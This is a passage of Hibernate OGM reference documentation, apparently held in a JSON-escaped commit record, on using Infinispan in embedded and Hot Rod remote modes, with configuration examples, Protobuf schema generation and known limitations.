\"David\"\n\n.2+^.^| [\"owners_id\", \"banksAccounts_id\"], [\"David\", \"account_2\"]\n | bankAccounts_id\n | \"account_2\"\n\n | owners_id\n | \"David\"\n\n|===\n====\n\n[[ogm-infinispan-transactions]]\n\n==== Transactions\n\nInfinispan supports transactions and integrates with any standard JTA `TransactionManager`;\nthis is a great advantage for JPA users as it allows to experience a _similar_ behaviour\nto the one we are used to when we work with RDBMS databases.\n\nThis capability is only available to Infinispan Embedded users: the transactional integration\ncapabilities are not exposed to the Hot Rod clients.\n\nIf you're having Hibernate OGM start and manage Infinispan,\nyou can skip this as it will inject the same `TransactionManager` instance\nwhich you already have set up in the Hibernate \/ JPA configuration.\n\nIf you are providing an already started Infinispan CacheManager instance\nby using the [acronym]`JNDI` lookup approach,\nthen you have to make sure the CacheManager is using the same `TransactionManager`\nas Hibernate:\n\n.Configuring a JBoss Standalone TransactionManager lookup in Infinispan configuration\n====\n[source, XML]\n----\n<default>\n <transaction\n transactionMode=\"TRANSACTIONAL\"\n transactionManagerLookupClass=\n \"org.infinispan.transaction.lookup.JBossStandaloneJTAManagerLookup\" \/>\n<\/default>\n----\n====\n\nInfinispan supports different transaction modes like `PESSIMISTIC` and `OPTIMISTIC`,\nsupports [acronym]`XA` recovery and provides many more configuration options;\nsee the http:\/\/infinispan.org\/documentation\/[Infinispan User Guide]\nfor more advanced configuration options.\n\n[[ogm-infinispan-indexstorage]]\n\n==== Storing a Lucene index in Infinispan\n\nHibernate Search, which can be used for advanced query capabilities (see <<ogm-query>>),\nneeds some place to store the indexes for its embedded `Apache Lucene` engine.\n\nA common place to store these indexes is the filesystem\nwhich is the default for Hibernate Search;\nhowever if your goal is to scale your NoSQL engine on multiple nodes\nyou need to share this index.\nNetwork sharing file systems are a possibility but we don't recommended that.\nOften the best option is to store the index\nin whatever NoSQL database you are using (or a different dedicated one).\n\n[TIP]\n====\nYou might find this section useful even if you don't intend to store your data in Infinispan.\n====\n\nThe Infinispan project provides an adaptor to plug into Apache Lucene,\nso that it writes the indexes in Infinispan and searches data in it.\nSince Infinispan can be used as an application cache to other NoSQL storage engines\nby using a CacheStore (see <<ogm-infinispan-storage>>)\nyou can use this adaptor to store the Lucene indexes\nin any NoSQL store supported by Infinispan:\n\n* JDBC databases\n* Cassandra\n* Filesystem (but locked correctly at the Infinispan level)\n* MongoDB\n* HBase\n* LevelDB\n* A secondary (independent) Infinispan grid\n\n\nHow to configure it? Here is a simple cheat sheet to get you started with this type of setup:\n\n* Add `org.infinispan:infinispan-directory-provider:{infinispanVersion}` to your dependencies\n* set these configuration properties:\n\n** `hibernate.search.default.directory_provider = infinispan`\n** `hibernate.search.default.exclusive_index_use = false`\n** `hibernate.search.infinispan.configuration_resourcename =` [infinispan configuration filename]\n\nThis configuration is simple and will work fine in most scenarios, but keep in mind that using\n'exclusive_index_use' will be neither fast nor scalable.\nFor high performance, high concurrency or production use please refer to the\nhttp:\/\/infinispan.org\/documentation\/[Infinispan documentation] for more advanced configuration options and tuning.\n\nThe referenced Infinispan configuration should define a `CacheStore`\nto load\/store the index in the NoSQL engine of choice.\nIt should also define three cache names:\n\n.Infinispan caches used to store indexes\n[cols=\"1,2,1\", options=\"header\"]\n|===============\n|Cache name|Description|Suggested cluster mode\n|LuceneIndexesLocking|Transfers locking information. Does not need a cache\n store.|replication\n|LuceneIndexesData|Contains the bulk of Lucene data. Needs a cache\n store.|distribution + L1\n|LuceneIndexesMetadata|Stores metadata on the index segments. Needs a cache\n store.|replication\n|===============\n\nThis configuration is not going to scale well on write operations:\nto do that you should read about the master\/slave and sharding options in Hibernate Search.\nThe complete explanation and configuration options can be found in the\nhttps:\/\/docs.jboss.org\/hibernate\/search\/{hibernate-search-major-minor-version}\/reference\/en-US\/html_single\/#infinispan-directories[Hibernate Search Reference Guide]\n\nSome NoSQL support storage of Lucene indexes directly,\nin which case you might skip the Infinispan Lucene integration\nby implementing a custom `DirectoryProvider` for Hibernate Search.\nYou're very welcome to share the code\nand have it merged in Hibernate Search for others to use, inspect, improve and maintain.\n\n[[ogm-infinispan-remote]]\n\n=== Hibernate OGM & Infinispan Server over Hot Rod\n\nIn this section we'll see how to configure Hibernate OGM to connect to\n\"Infinispan Server using the Hot Rod protocol\", which we will call \"Infinispan Remote\"\nfor brevity and to differentiate it from \"Infinispan Embedded\".\n\nIn this mode Hibernate OGM can not boostrap or otherwise control the lifecycle\nof Infinispan, so we will assume that you already have a cluster of Infinispan Server\nnodes running.\nFor instructions on setting one up, see the http:\/\/infinispan.org\/docs\/stable\/server_guide\/server_guide.html[Infinispan Server Guide].\n\nThe good news is that - since it's a separate service - there won't be much to configure\nin Hibernate OGM.\n\n[CAUTION]\n====\nThe Hibernate OGM support for Infinispan Remote is considered experimental.\nIn particular, the storage format is not set in stone.\n====\n\n==== Adding Infinispan Remote dependencies\n\nTo use Hibernate OGM to connect to an Infinispan Server using the Hot Rod protocol, you will need the following extension\nand its transitive dependencies (which include, among others, the Hot Rod client):\n \n[source, XML]\n[subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.hibernate.ogm<\/groupId>\n <artifactId>hibernate-ogm-infinispan-remote<\/artifactId>\n <version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\n==== Configuration properties for Infinispan Remote\n\nFirst, let Hibernate know that you want to use the OGM Infinispan Remote datastore by setting the\n`hibernate.ogm.datastore.provider` property to `infinispan_remote`.\n\nThe next step is to configure the Hot Rod client.\nYou have two options:\n\n* either provide a resource file containing all Hot Rod client configuration properties\n* or include all the Hot Rod client configuration properties with a custom prefix, as explained below.\n\nTo use an external configuration resource, set the `hibernate.ogm.infinispan_remote.configuration_resource_name`\nconfiguration property to the resource name.\n\n.Using a separate resource to configure the Hot Rod client\n====\n[source, XML]\n----\n<?xml version=\"1.0\"?>\n<persistence xmlns=\"http:\/\/java.sun.com\/xml\/ns\/persistence\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/persistence http:\/\/java.sun.com\/xml\/ns\/persistence\/persistence_2_0.xsd\"\n\tversion=\"2.0\">\n\n\t<persistence-unit name=\"ogm-with-hotrod\">\n\t\t<provider>org.hibernate.ogm.jpa.HibernateOgmPersistence<\/provider> # <1>\n\t\t<properties>\n\t\t\t<property name=\"hibernate.ogm.datastore.provider\"\n\t\t\t\tvalue=\"infinispan_remote\" \/> # <2>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.configuration_resource_name\"\n\t\t\t\tvalue=\"hotrodclient.properties\" \/> # <3>\n\t\t<\/properties>\n\t<\/persistence-unit>\n<\/persistence>\n----\n<1> Choose Hibernate OGM as JPA Provider\n<2> pick `infinispan_remote` as datastore\n<3> point to the Hot Rod configuration file\n\n[source]\n----\ninfinispan.client.hotrod.server_list = 127.0.0.1:11222\ninfinispan.client.hotrod.tcp_no_delay = true\ninfinispan.client.hotrod.tcp_keep_alive = false\n\n## below is connection pooling config\nmaxActive=-1\nmaxTotal = -1\nmaxIdle = -1\nwhenExhaustedAction = 1\ntimeBetweenEvictionRunsMillis = 120000\nminEvictableIdleTimeMillis = 300000\ntestWhileIdle = true\nminIdle = 1\n----\n====\n\nAlternatively you can embed the Hot Rod properties in your Hibernate (or JPA) configuration\nfile, but you'll have to replace the `infinispan.client.hotrod.` prefix with the custom\nprefix `hibernate.ogm.infinispan_remote.client.`.\n\nSome of the Hot Rod client configuration properties don't normally use a prefix - specifically\nall properties relating to connection pooling as in the previous example - these will also\nneed to use the `hibernate.ogm.infinispan_remote.client.` prefix.\n\nProperties set with the `hibernate.ogm.infinispan_remote.client.` prefix will override the same\nproperties configured using an external reosurce file.\n\n.Embedding the Hot Rod client configuration properties in the Hibernate configuration\n====\n[source, XML]\n----\n<?xml version=\"1.0\"?>\n<persistence xmlns=\"http:\/\/java.sun.com\/xml\/ns\/persistence\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/persistence http:\/\/java.sun.com\/xml\/ns\/persistence\/persistence_2_0.xsd\"\n\tversion=\"2.0\">\n\n\t<persistence-unit name=\"ogm-with-hotrod\">\n\t\t<provider>org.hibernate.ogm.jpa.HibernateOgmPersistence<\/provider> # <1>\n\t\t<properties>\n\t\t\t<property name=\"hibernate.ogm.datastore.provider\"\n\t\t\t\tvalue=\"infinispan_remote\" \/> # <2>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.server_list\"\n\t\t\t\tvalue=\"127.0.0.1:11222\" \/> # <3>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.tcp_no_delay\"\n\t\t\t\tvalue=\"true\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.tcp_keep_alive\"\n\t\t\t\tvalue=\"false\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.maxActive\"\n\t\t\t\tvalue=\"-1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.maxTotal\"\n\t\t\t\tvalue=\"-1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.maxIdle\"\n\t\t\t\tvalue=\"-1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.whenExhaustedAction\"\n\t\t\t\tvalue=\"1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.timeBetweenEvictionRunsMillis\"\n\t\t\t\tvalue=\"120000\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.minEvictableIdleTimeMillis\"\n\t\t\t\tvalue=\"300000\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.testWhileIdle\"\n\t\t\t\tvalue=\"true\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.minIdle\"\n\t\t\t\tvalue=\"1\" \/>\n\t\t<\/properties>\n\t<\/persistence-unit>\n<\/persistence>\n----\n<1> Choose Hibernate OGM as JPA Provider\n<2> pick `infinispan_remote` as datastore\n<3> include Hot Rod configuration properties, just replacing\/adding the OGM prefix.\n====\n\nIn the next section we'll see a couple more advanced properties which might be of interest.\n\nhibernate.ogm.infinispan_remote.schema_capture_service::\nIf you set this to an implementation of `org.hibernate.ogm.datastore.infinispanremote.schema.spi.SchemaCapture` you\ncan collect any generated Protobuf Schema. Could be useful for integrations with other tools.\nYou can either provide a fully qualified classname or a `SchemaCapture`, or pass an instance of a `SchemaCapture`\nin the configuration properties, if you're booting Hibernate programmatically.\n\nhibernate.ogm.infinispan_remote.schema_package_name::\nDefines the package name of the generated Protobuf schema. Defaults to `HibernateOGMGenerated`.\nUseful to isolate different applications using the same Infinispan Server instance.\n\n\n==== Data encoding: Protobuf Schema\n\nUsing the _Infinispan Remote_ backend your data will be encoded using Protocol Buffers,\nalso known as Protobuf.\n\n> Protocol Buffers are a language-neutral, platform-neutral\n> extensible mechanism for serializing structured data\n> -- https:\/\/developers.google.com\/protocol-buffers\/\n\nThis encoding strategy will be used both during _transmission_ to and from the datagrid, and\nas a _storage format_ on the Infinispan Server.\n\nTypical usage of Google's developer tools for Java would require you to download the `protoc`\ncompiler to generate Java stubs; you won't need that when using Hibernate OGM as the backend\nwill generate the encoding and decoding functions on the fly from your entities.\n\nThe benefit of having Hibernate OGM generate the schema for you will make it easier to get\nstarted, but there's a drawback: you are not directly in control of the protobuf schema\nIt will deploy this schema - or expect a compatible schema to be deployed - as it will use\nits generated codecs to read and write data to the Infinispan Server.\n\nThe protobuf technology is designed to allow evolution of your schema: you can deploy a\ndifferent schema on the Infinispan Server than the one OGM expects, but this is an advanced\ntopic and you'll have to make sure the deployed schema is compatible with the one OGM is\ngenerating and using.\n\nAnother reason to make sure the deployed protobuf schema is a _compatible evolution_ of\na previous schema, is to make sure you can still read data which is already stored in\nthe datagrid.\n\n[IMPORTANT]\n====\nRemember that the Protobuf schema is used both during _transmission_ and _storage_.\nThe fact that it's used also during _transmission_ of your data is a key difference to the\nschema of a SQL database.\n\nFor example even if a property \"A\" is not nullable in terms of storage, you will still\nwant it to be flagged as `optional` in a protobuf schema to allow, for example, retrieving\na subset of data properties without having to always retrieve the property \"A\".\n====\n\nYou don't need to do anything regarding the schema: Hibernate OGM will automatically\ndeploy it to the Infinispan datagrid at boostrap of Hibernate.\nYou might want to keep this in mind though, both to be able to evolve your schema\nwithout data loss, and to be able to generate decoders for other Infinispan clients not\nusing Hibernate OGM.\n\nThe deployed schemas can be fetched from the Infinispan Server; Hibernate OGM also\nlogs the generated schemas at `INFO` level in the logging category\n`org.hibernate.ogm.datastore.infinispanremote.impl.protobuf.SchemaDefinitions`.\n\n[[storage-principles-of-infinispan-dataprovider]]\n\n==== Storage Principles of the Infinispan Remote dataprovider\n\nThis is actually very simple.\n\nImagine you were mapping your entities to a traditional, table based [acronym]`RDBMS`;\nnow instead of tables, you have caches. Each cache has a name, and a consistent schema,\nand for each cache we define a key with some properties (the id, aka the primary key).\n\nRelations are mapped by encoding a \"foreign key\"; these are used either as keys perform\na key lookup on another table, or can be used in queries on other tables to identify\nrelations which have a higher than one cardinality.\n\nSo let's highlight the differences with the relational world:\n\nReferential integrity::\nWhile we can use relations based on foreign keys, Infinispan has no notion of referential integrity.\nHibernate is able to maintain the integrity as it won't \"forget\" stale references, but since\nthe storage doesn't support transactions either it is possible to interrupt Hibernate OGM\nduring such maintenance and introduce breaks of integrity.\n\nWhen integrity could be broken::\nWhen the unit of work involves several operations we might risk to have a partial writes\n(updates, deletes, inserts); due to the fact that the Hot Rod client is not transactional\nsome operation would be flushed to data store, other not.\nFor instance let's imagine you create a new entity, remove an old one and update an association\nfrom the old to the new one in a single transaction,\nthis would correspond to three different remote invocations: an Entity insert, an Entity delete\nand an Association update.\nIf there were network problems during the third invocation,\nwe could have a partial write in which only the first and the second operations\nwould be actually stored on the remote storage and this could lead to a breaking referential\nintegrity of the association.\n\nHow to detect broken integrity::\nUnfortunately, at the moment the only way to detect a referential integrity error is to\ninspect the logs for error messages or periodically monitor the associations cache.\n\nA key. And a Value.::\nIn a key\/value store the two elements _key_ and _value_ are different, separate objects.\nThe schema - and consequentially all operations - generated by Hibernate OGM will treat\nand encode these two objects separately. You will notice that the attributes of the key\nare encoded in the value *as well*, as it is not possible to run e.g. range queries\non attributes of keys.\n\nNo Sequences, no auto-incrementing values::\nInfinispan does not support sequences, yet allows concurrent \"compare and set\" operations;\nHibernate OGM makes use of such CAS operations to emulate the need of sequences or auto-incrementing\nprimary keys if your entity mapping uses them, however this solution might not work\nunder high load: make sure to use a different strategy, such as assigning IDs explicitly,\nor using the `org.hibernate.id.UUIDGenerator` generator.\nHibernate OGM will log a warning if it detects excessive spinning on such CAS operations.\n\nNot mapped to JDBC types, but to Protobuf types::\nRather than mapping your Java properties to corresponding JDBC (SQL) types, your Java\nproperties are mapped to Protobuf types.\nSee the https:\/\/developers.google.com\/protocol-buffers\/docs\/proto#scalar[protobuf documentation]\nfor an overview of protocol buffer \"primitive\" types.\n\n.Example auto-generated Protobuf Schema for a simple entity\n====\n[source, JAVA]\n----\nimport javax.persistence.Column;\nimport javax.persistence.Entity;\nimport javax.persistence.Id;\n\n@Entity\npublic class Hypothesis {\n\n\t@Id String id;\n\n\tString description;\n\n\t@Column(name = \"pos\")\n\tint position;\n\n}\n----\n[source]\n----\npackage HibernateOGMGenerated; # <1>\n\nmessage Hypothesis_id { # <2>\n\trequired string id = 1;\n}\n\nmessage Hypothesis {\n\trequired string id = 1;\n\toptional string description = 2;\n\toptional int32 pos = 3; # <3>\n}\n----\n<1> The default Protobuf package name.\n<2> A dedicated message type for the Key of the Key\/Value pair\n<3> The `pos` attribute name respects the option of the `@Column` annotation\n====\n\nThe above example shows how a Protobuf schema looks like, as automatically generated from a mapped entity.\nAny property type supported by Hibernate ORM will be converted to a matching Protobuf type.\n\n===== Each Table requires a Cache with the same name\n\nIn a relational database world, when Hibernate defines the schema this implicitly creates the tables;\nthis is not the case on Infinispan.\n\nWith Infinispan, the _Protobuf Schema_ just unlocks the capability to transmit messages with\nsuch payloads (read\/write), and allows the remote servers to process the fields, for example\nto execute queries and extract projections out of the stored entries.\nSo this establishes a transmission and storage encoding contract, but doesn't actually\nstart or allocate any storing Cache.\n\nHibernate OGM by convention will write to several named ``Cache``s, mapping each \"table name\"\nto a \"cache name\". In the above example, when having an `Hypothesis` entity this will\nwrite to a Cache named `Hypothesis`.\n\nThe benefit is that you can tune each cache (each \"table\") independently; for example you could\nconfigure the caches for the most important data to have a synchronous CacheStore which replicates\ndata to a relational database, and have less important entries use an asynchronous CacheStore,\nor none at all, to favour performance over redundancy.\n\nThe drawback of this design choice is that each named cache must be pre-defined in the Infinispan\nServer configuration: at this point, the Hot Rod protocol is not allowed to start missing caches\nso Hibernate OGM can not define the missing tables automatically.\nIt generates the encoding protobuf, but you have to list the Cache names in the server configuration.\n\n[WARNING]\n====\nFor each \"table name\" your model would generate on a relational database, you have to define\na matching Cache on the Infinispan Server.\n\nIf any Cache is missing, Hibernate OGM will fail to start and list which table names were\nexpected, but not found. We plan to automate the creation of missing caches in the future.\n====\n\n\n==== Known Limitations & Future improvements\n\nThe Infinispan Remote dataprovider has some known limitations, some of which are\nunsolvable without further development of Infinispan itself.\n\nTransaction Support::\nWe're eagerly waiting for Infinispan to support transactions over Hot Rod, as it\nalready provides this feature in Embedded Mode.\n\nQueries::\nAt this point the Hibernate OGM backend is able to run the queries it needs to materialize\nrelations, but does not yet translate JPQL queries nor Criteria queries to the\nInfinispan remote queries.\n\nIndexing::\nInfinispan supports Hibernate Search annotations directly embedded within its protobuf\nschema definitions; this would enable the queries on them to use indexes.\nHibernate OGM doesn't generate these annotations in the schemas it generates yet.\n\nNative support for write skew checks::\nThe Hot Rod client has native support for versioning of datagrid entries, yet this is\nnot supported on all of the client APIs. For Hibernate OGM to be able to consistently\nuse versioning requires enhancements to the Hot Rod client API.\n\nEnums::\nProtobuf has native support for Enum types, yet the JPA annotations force to choose\nbetween ordinal or string encoding. We might have to introduce a \"native\" encoding,\nprobably via a novel mapping annotation.\nHibernate OGM supports the native protobuf Encoding but the JPA metadata will always\nforce the ordinal or string representations.\n\nNesting and embedding::\nThe Protobuf schema could allow us to embed objects, including series of objects,\nas nested elements. This could allow mappings similar to the document based NoSQL\nstores, such as our MongoDB dialect, but is not supported yet.\n\nAutomatic creating of ``Cache``s::\nWhen deploying the _Protobuf Schema_, we should also automatically define and start\nthe needed Caches if they are not defined.\nThis is currently not allowed over the Hot Rod protocol.\n\n","old_contents":"[[ogm-infinispan]]\n\n\/\/ vim: set colorcolumn=100:\n\n== Infinispan\n\nInfinispan is an open source in-memory data grid focusing on high performance.\nAs a data grid, you can deploy it on multiple servers - referred to as nodes -\nand connect to it as if it were a single storage engine:\nit will cleverly distribute both the computation effort and the data storage.\n\nIt is trivial to setup on a single node and Hibernate OGM knows how to boot one,\nso you can easily try it out.\nBut Infinispan really shines in multiple node deployments:\nyou will need to configure some networking details\nbut nothing changes in terms of application behaviour,\nwhile performance and data size can scale linearly.\n\nFrom all its features we will only describe those relevant to Hibernate OGM;\nfor a complete description of all its capabilities and configuration options,\nrefer to the Infinispan project documentation at\nhttp:\/\/infinispan.org\/documentation\/[infinispan.org].\n\n=== Why use Hibernate OGM with Infinispan?\n\nInfinispan provides great scalability and elasticity features but\nit can have a steep learning curve.\n\nIf you are already familiar with the JPA API you will\nbe able to store your data in Infinispan quickly and you will also benefit\nfrom the optimizations that a framework like Hibernate OGM can\napply under the hood.\n\nIn particular:\n\n* you can get started without having to learn `Protobuf` first\n* no need to learn the Infinispan API\n* Hibernate OGM will setup and manage the `Hot Rod client` for you\n* same API as Hibernate ORM, meaning that you can use the same tools\n\nYou will still need to learn about Infinispan, all its capabilities and how to configure\nthem to reach your application top performance, but you can get a proof of concept\ndone quickly with the example configuration.\n\n=== Infinispan: Choosing between Embedded Mode and Hot Rod\n\nJava applications can use Infinispan in two fundamentally different ways:\n\n* Run Infinispan in _Embedded Mode_.\n* Connect to an _Infinispan Server_ using an _Hot Rod client_.\n\nHibernate OGM supports connecting in either mode, but since the APIs and capabilities\nare different in the two modes, it provides two different modules\neach having its own set of configuration options and features.\n\nRunning Infinispan in _Embedded Mode_ implies that the Infinispan node is running\nin the same JVM as the code using it.\nThe benefit is that some data (or all data) will be stored on the same JVM, making reads\nof this data extremely fast and efficient as there won't be RPCs to other systems.\nWrite operations will still need to issue some coordination RPCs but they also\nbenefit from a reduction of necessary operations.\n\nHowever the very fact that some data is stored in the same JVM is also the drawback\nof this choice: this typically implies having to configure your JVM for larger\nheap sizes, which are harder to tune for optimal performance. Other system\nparameters might also need to be configured as this JVM node is now to be treated\nas a \"data holding node\" rather than a stateless app node.\nSome architects and system administrators will not like that.\n\nWhen connecting to an _Infinispan Server_ over the _Hot Rod client_, the architecture\nis similar to having Hibernate connect to traditional database: the data is stored\non the _Infinispan Server_ nodes, and Hibernate OGM uses a client with a pool of\nTCP connections to talk to the server.\n\nAnother important difference, is that when connecting to _Infinispan Server_ via\n_Hot Rod_ the data is encoded using _Google Protobuf_, which requires a schema.\nThis schema is auto-generated by Hibernate OGM.\n\nHaving a _Protobuf Schema_ makes it possible to evolve the schema in non-destructive\nways, and makes it possible for other clients to access the data - even clients written\nin other programming languages.\n\n[NOTE]\n====\nMost introductory tutorials of Hibernate OGM focus on Infinispan in _Embedded Mode_\nbecause in this mode OGM can start its own embedded Infinispan node, using\na simple, local only Infinispan configuration.\n\nWhen using _Infinispan Server_ instead, you'll need to http:\/\/infinispan.org\/download\/[download\nthe server distribution], unpack and start it, then set the Hibernate OGM configuration\nproperties so that the integrated Hot Rod client knows how to connect to it.\n====\n\n[TIP]\n====\n[.lead]\nAdvanced performance options & interaction with Hibernate 2nd level caching\n\nWhen using Infinispan in Embedded Mode, and it's caches are configured in `REPLICATION` Mode,\nall nodes will contain a full replica of the database: write performance won't scale but\nyour reads will be very fast and scale up linearly with the size of the cluster,\nmaking usage of Hibernate's 2nd level cache redundant.\n\nWhen configuring Infinispan in `DISTRIBUTED` cache mode, each of your nodes will have a\nlocal copy of a slice of your data; remember you can tune how large the section\nshould be with various Infinispan configuration options (such as _numOwners_), and you\ncould combine this with Hibernate's 2nd level caching and\/or enable Infinispan's\n1st level caching.\n\nYou can even combine Infinispan with having it passivate to other storage systems\nsuch as a RDBMs or another NoSQL engine; such storage can be configured to be asynchronous.\nThis option is available to both Infinispan Embedded and Infinispan Server; it's even possible\nto use a light layer of Infinispan Embedded - containing a small data set - and have it\nbacked by an Infinispan Server cluster to expand its storage capabilities without\nhaving to enlarge heap size too much on the embedded, application nodes.\n\nFinally, remember that options such as replication vs distribution (`CacheMode`) and passivation\nto additional storage (``CacheStore``s) can be configured differently for each of Infinispan caches.\n====\n\n[[ogm-infinispan-embedded]]\n=== Hibernate OGM & Infinispan Embedded\n\nLet's see how to configure and use Hibernate OGM with Infinispan in Embedded Mode.\n\nFor usage of Infinispan Server over Hot Rod, skip to <<ogm-infinispan-remote>>.\n\n[[ogm-infinispan-configuration]]\n\n==== Configure Hibernate OGM for Infinispan Embedded\n\nYou configure Hibernate OGM and Infinispan in two steps basically:\n\n* Add the dependencies to your classpath\n* And then choose one of:\n\n** Use the default Infinispan configuration (no action needed)\n** Point to your own configuration resource file\n** Point to a [acronym]`JNDI` name of an existing instance of an Infinispan `CacheManager`\n\n* If you need to run JPQL or HQL queries, add Hibernate Search on the classpath\n (<<ogm-query-using-hibernate-search>>)\n\nNote that, except when using [acronym]`JNDI`, Hibernate OGM will bootstrap and Infinispan Embedded node\nin your same JVM, and terminate it on shutdown of the Hibernate instance.\n\n[CAUTION]\n====\nIf you have Hibernate OGM boot Infinispan using a clustered configuration, this might automatically join the cluster of\nother Infinispan nodes running in your network: the default is automatic discovery!\n====\n\n[[ogm-infinispan-adddepencies]]\n\n==== Adding Infinispan dependencies\n\nTo add the dependencies for the Hibernate OGM extensions for Infinispan Embedded via Maven, add the following module:\n\n\n[source, XML]\n[subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.hibernate.ogm<\/groupId>\n <artifactId>hibernate-ogm-infinispan-embedded<\/artifactId>\n <version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\nIf you're not using a dependency management tool,\ncopy all the dependencies from the distribution in the directories:\n\n* `\/lib\/required`\n* `\/lib\/infinispan`\n* Optionally - depending on your container - you might need some of the jars from `\/lib\/provided`\n\n\n[[ogm-infinispan-configuration-properties]]\n\n==== Infinispan specific configuration properties\n\nThe advanced configuration details of an Infinispan Cache\nare defined in an Infinispan specific XML configuration file;\nthe Hibernate OGM properties are simple\nand usually just point to this external resource.\n\nTo use the default configuration provided by Hibernate OGM -\nwhich is a good starting point for new users - you don't have to set any property.\n\n.Hibernate OGM properties for Infinispan\n`hibernate.ogm.datastore.provider`::\nSet it to `infinispan_embedded` to use Infinispan as the datastore provider in embedded mode.\n`hibernate.ogm.infinispan.cachemanager_jndi_name`::\nIf you have an Infinispan `EmbeddedCacheManager` registered in JNDI,\nprovide the JNDI name and Hibernate OGM will use this instance\ninstead of starting a new `CacheManager`.\nThis will ignore any further configuration properties\nas Infinispan is assumed being already configured.\nInfinispan can typically be pushed to JNDI via WildFly, Spring or Seam.\n`hibernate.ogm.infinispan.configuration_resource_name`::\nShould point to the resource name of an Infinispan configuration file.\nThis is ignored in case [acronym]`JNDI` lookup is set.\nDefaults to `org\/hibernate\/ogm\/datastore\/infinispan\/default-config.xml`.\n`hibernate.ogm.datastore.keyvalue.cache_storage`::\nThe strategy for persisting data in Infinispan.\nThe following two strategies exist (values of the `org.hibernate.ogm.datastore.keyvalue.options.CacheMappingType` enum):\n\n* `CACHE_PER_TABLE`: A dedicated cache will be used for each entity type, association type and id source table.\n* `CACHE_PER_KIND`: Three caches will be used: one cache for all entities, one cache for all associations and one cache for all id sources.\n\n+\nDefaults to `CACHE_PER_TABLE`. It is the recommended strategy as it makes it easier to target a specific cache for a given entity.\n`hibernate.ogm.datastore.create_database`::\nIf set to `true` Hibernate OGM will create any missing Cache definitions on the Infinispan Server.\nThis requires the Infinispan Server configuration to have a default configuration defined, as this will be copied to the newly defined caches.\nIf set to `false` an exception is thrown when a Cache is expected but not explicitly configured on the server.\nDefaults to `false`.\n\n[NOTE]\n====\nWhen bootstrapping a session factory or entity manager factory programmatically,\nyou should use the constants accessible via `org.hibernate.ogm.datastore.infinispan.InfinispanProperties`\nwhen specifying the configuration properties listed above.\n\nCommon properties shared between stores are declared on `OgmProperties`\n(a super interface of `InfinispanProperties`).\n\nFor maximum portability between stores, use the most generic interface possible.\n====\n\n==== Cache names used by Hibernate OGM\n\nDepending on the cache mapping approach, Hibernate OGM will either:\n\n* store each entity type, association type and id source table in a dedicated cache\n very much like what Hibernate ORM would do. This is the `CACHE_PER_TABLE` approach.\n* store data in three different caches when using the `CACHE_PER_KIND` approach:\n** `ENTITIES`: is going to be used to store the main attributes of all your entities.\n** `ASSOCIATIONS`: stores the association information representing the links between entities.\n** `IDENTIFIER_STORE`: contains internal metadata that Hibernate OGM needs\n to provide sequences and auto-incremental numbers for primary key generation.\n\nThe preferred strategy is `CACHE_PER_TABLE` as it offers both more fine grained configuration options\nand the ability to work on specific entities in a more simple fashion.\n\nIn the following paragraphs, we will explain which aspects of Infinispan\nyou're likely to want to reconfigure from their defaults.\nAll attributes and elements from Infinispan which we don't mention are safe to ignore.\nRefer to the http:\/\/infinispan.org\/documentation\/[Infinispan User Guide]\nfor the guru level performance tuning and customizations.\n\nAn Infinispan configuration file is an XML file complying with the Infinispan schema;\nthe basic structure is shown in the following example:\n\n.Simple example of an Infinispan configuration file\n====\n[source, XML]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<infinispan\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"urn:infinispan:config:9.1 http:\/\/www.infinispan.org\/schemas\/infinispan-config-9.1.xsd\"\n xmlns=\"urn:infinispan:config:9.1\">\n\n <cache-container name=\"HibernateOGM\" default-cache=\"DEFAULT\">\n\n <!-- Default cache settings -->\n <local-cache name=\"DEFAULT\">\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <\/local-cache>\n\n <local-cache name=\"User\"\/>\n\n <local-cache name=\"Order\"\/>\n\n <local-cache name=\"associations_User_Order\"\/>\n\n <\/cache-container>\n<\/infinispan>\n----\n====\n\nThere are global settings that can be set before the `cache_container` section.\nThese settings will affect the whole instance;\nmainly of interest for Hibernate OGM users is the `jgroups` element\nin which we will set JGroups configuration overrides.\n\nInside the `cache-container` section are defined explicit named caches and their configurations\nas well as the default cache (named `DEFAULT` here) if we want to affect all named caches.\nThis is where we will likely want to configure clustering modes, eviction policies and ``CacheStore``s.\n\n[[ogm-infinispan-storage]]\n\n==== Manage data size\n\nIn its default configuration Infinispan stores all data in the heap of the JVM;\nin this barebone mode it is conceptually not very different than using a HashMap:\nthe size of the data should fit in the heap of your VM,\nand stopping\/killing\/crashing your application will get all data lost\nwith no way to recover it.\n\nTo store data permanently (out of the JVM memory) a `CacheStore` should be enabled.\nThe Infinispan project provides many `CacheStore` implementations;\na simple one is the http:\/\/infinispan.org\/docs\/stable\/user_guide\/user_guide.html#single_file_store[\"Single File Store\"]\nwhich is able to store data in simple binary files, on any read\/write mounted filesystem;\nYou can find many more implementations to store your data in anything\nfrom JDBC connected relational databases, other NoSQL engines such as MongoDB and Cassandra,\nor even delegate to other Infinispan clusters.\nFinally, implementing a custom `CacheStore` is quite easy.\n\nTo limit the memory consumption of the precious heap space,\nyou can activate a `passivation` or an `eviction` policy;\nagain there 